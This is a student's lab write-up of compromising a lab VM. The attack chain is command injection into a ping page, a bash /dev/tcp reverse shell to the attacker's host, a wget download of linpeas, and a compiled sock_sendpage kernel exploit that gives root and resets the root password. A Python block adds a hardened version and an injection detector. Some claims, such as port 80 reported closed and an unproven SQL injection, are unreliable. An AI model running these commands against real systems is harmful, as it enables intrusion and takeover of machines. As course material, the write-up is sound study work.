Lab3
Network Atk&Def lab3 241840273 杨良灼
Query the attacker machine's IP.
└─$ sudo ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 10.0.2.4 netmask 255.255.255.0 broadcast 10.0.2.255
inet6 fe80::9d17:dec1:4341:a804 prefixlen 64 scopeid 0x20<link>
ether 08:00:27:3c:97:80 txqueuelen 1000 (Ethernet)
RX packets 1 bytes 590 (590.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 23 bytes 3090 (3.0 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 8 bytes 480 (480.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 8 bytes 480 (480.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
Port scan.
└─$ sudo nmap -p22,80,111,443,631,3306 -sV 10.0.2.15
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-20 07:55 EDT
Nmap scan report for 10.0.2.15
Host is up (0.000037s latency).
PORT STATE SERVICE VERSION
22/tcp closed ssh
80/tcp closed http
111/tcp closed rpcbind
443/tcp closed https
631/tcp closed ipp
3306/tcp closed mysql
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.39 seconds
Using the Burp Suite tool:

Click Open browser, then enter <target IP>/index.php in the URL bar.

Turn on interception (Intercept off -> Intercept on).
Type in anything; the intercepted request shows the username (uname) and password (psw) parameters:
POST /index.php HTTP/1.1
Host: 10.0.2.15
Content-Length: 38
Cache-Control: max-age=0
Accept-Language: zh-CN,zh;q=0.9
Origin: http://10.0.2.15
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://10.0.2.15/index.php
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
uname=123456&psw=114514&btnLogin=Login
Hence the username field should have a SQL injection vulnerability.

Enter <IP address>.

It reports the address as reachable; suspecting the input is passed to a shell command line, try appending a command, <IP address>; whoami, and attack it.

This returned the username apache.
Next, set up a reverse shell. First pick an arbitrary unused port as the listening port, e.g. 3433:
Run nc -lvvp 3433 in the host terminal:
└─$ nc -lvvp 3433
listening on [any] 3433 ...
Then submit 10.0.2.15; bash -i >& /dev/tcp/10.0.2.4/3433 0>&1; the listener receives:
└─$ nc -lvvp 3433
listening on [any] 3433 ...
Warning: forward host lookup failed for bogon: Unknown host
connect to [10.0.2.4] from bogon [10.0.2.15] 32769
bash: no job control in this shell
bash-3.00$
Running whoami succeeds and returns apache:
bash-3.00$ whoami
apache
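The ping page above is exploitable because the submitted address is concatenated into a shell command line, which is also what lets the bash /dev/tcp reverse shell through. As an added example (not code from the lab or the target application), the following Python shows the same flaw beside its hardened form, which accepts only a literal IP address and invokes ping through an argv list with no shell, plus a small check a defender could use to flag submitted values that carry shell metacharacters. The function names and the ping command format are assumptions.

```python
import ipaddress
import subprocess


def build_ping_command_vulnerable(target: str) -> str:
    # Mirrors the lab's ping page: user input is concatenated straight into
    # a shell command string, so "10.0.2.15; whoami" becomes two commands.
    # Returned as a string only; this example never hands it to a shell.
    return f"ping -c 1 {target}"


def validate_target(target: str) -> str:
    # Accept only a literal IPv4/IPv6 address. Hostnames, whitespace and
    # shell metacharacters all make ipaddress.ip_address() raise ValueError.
    return str(ipaddress.ip_address(target.strip()))


def is_valid_target(target: str) -> bool:
    try:
        validate_target(target)
        return True
    except ValueError:
        return False


def build_ping_command_hardened(target: str) -> list[str]:
    # The validated address becomes a single argv element, so it can never
    # be parsed as additional commands.
    return ["ping", "-c", "1", validate_target(target)]


def run_ping(target: str) -> subprocess.CompletedProcess:
    # shell=False is the default for a list argument; nothing here reaches /bin/sh.
    return subprocess.run(build_ping_command_hardened(target),
                          capture_output=True, text=True, timeout=5)


def looks_like_injection(value: str) -> bool:
    # Logging/detection helper for the web tier: flag submitted values with
    # shell metacharacters or the /dev/tcp redirection used by bash reverse shells.
    markers = (";", "&", "|", "`", "$(", "\n", "/dev/tcp/")
    return any(m in value for m in markers)
```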
We now have this user's privileges; next, attempt privilege escalation.
Download linpeas.sh, start an HTTP server with Python, and transfer the file from the host to the target.
└─$ python -m http.server 1142
Serving HTTP on 0.0.0.0 port 1142 (http://0.0.0.0:1142/) ...
Open http://localhost:1142/ in the browser to find the file path, place the linpeas.sh file there, then download it on the target:
bash-3.00$ pwd
/tmp
bash-3.00$ wget http://10.0.2.4:1142/Public/linpeas.sh
Check the file:
bash-3.00$ ls -l
total 944
-rw-r--r-- 1 apache apache 961834 Oct 14 04:26 linpeas.sh
After the download, the file lacks execute permission; make it executable and run it.
bash-3.00$ chmod a+x linpeas.sh
bash-3.00$ ls -l
total 944
-rwxr-xr-x 1 apache apache 961834 Oct 14 04:26 linpeas.sh
bash-3.00$ ./linpeas.sh
After a moment, note that the operating system is CentOS on Linux 2.6, which is quite old.
╔══════════╣ Operative system
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#kernel-exploits
Linux version 2.6.9-55.EL (mockbuild@builder6.centos.org) (gcc version 3.4.6 20060404 (Red Hat 3.4.6-8)) #1 Wed May 2 13:52:16 EDT 2007
LSB Version: :core-3.0-ia32:core-3.0-noarch:graphics-3.0-ia32:graphics-3.0-noarch
Distributor ID: CentOS
Description: CentOS release 4.5 (Final)
Release: 4.5
Codename: Final
Search https://www.exploit-db.com/ and searchsploit for its vulnerabilities and tools:

└─$ searchsploit linux 2.6 centos
-------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
-------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Linux Kernel 2.4.x/2.6.x (CentOS 4.8/5.3 / RHEL 4.8/5.3 / SuSE 10 SP2/11 / Ubuntu 8.10) (PPC) - 'sock_sendpage()' Local P | linux/local/9545.c
Linux Kernel 2.4/2.6 (RedHat Linux 9 / Fedora Core 4 < 11 / Whitebox 4 / CentOS 4) - 'sock_sendpage()' Ring0 Privilege Es | linux/local/9479.c
Linux Kernel 2.6 < 2.6.19 (White Box 4 / CentOS 4.4/4.5 / Fedora Core 4/5/6 x86) - 'ip_append_data()' Ring0 Privilege Esc | linux_x86/local/9542.c
Linux Kernel 2.6.32 < 3.x (CentOS 5/6) - 'PERF_EVENTS' Local Privilege Escalation (1) | linux/local/25444.c
Linux Kernel 2.6.x / 3.10.x / 4.14.x (RedHat / Debian / CentOS) (x64) - 'Mutagen Astronomy' Local Privilege Escalation | linux_x86-64/local/45516.c
-------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Here we use the 9545.c script:
Check whether gcc is present; it is, so the C source file can be downloaded and compiled locally on the target.
bash-3.00$ gcc
gcc: no input files
Download the file, then run it to gain privileges and change the password.
bash-3.00$ chmod 777 9545.c
bash-3.00$ gcc -o exp 9545.c
9545.c:376:28: warning: no newline at end of file
bash-3.00$ ./exp
sh: no job control in this shell
sh-3.00# whoami
root
sh-3.00# passwd
New UNIX password: s0aked1020
Retype new UNIX password: s0aked1020
Changing password for user root.
passwd: all authentication tokens updated successfully.
Login to the target succeeded.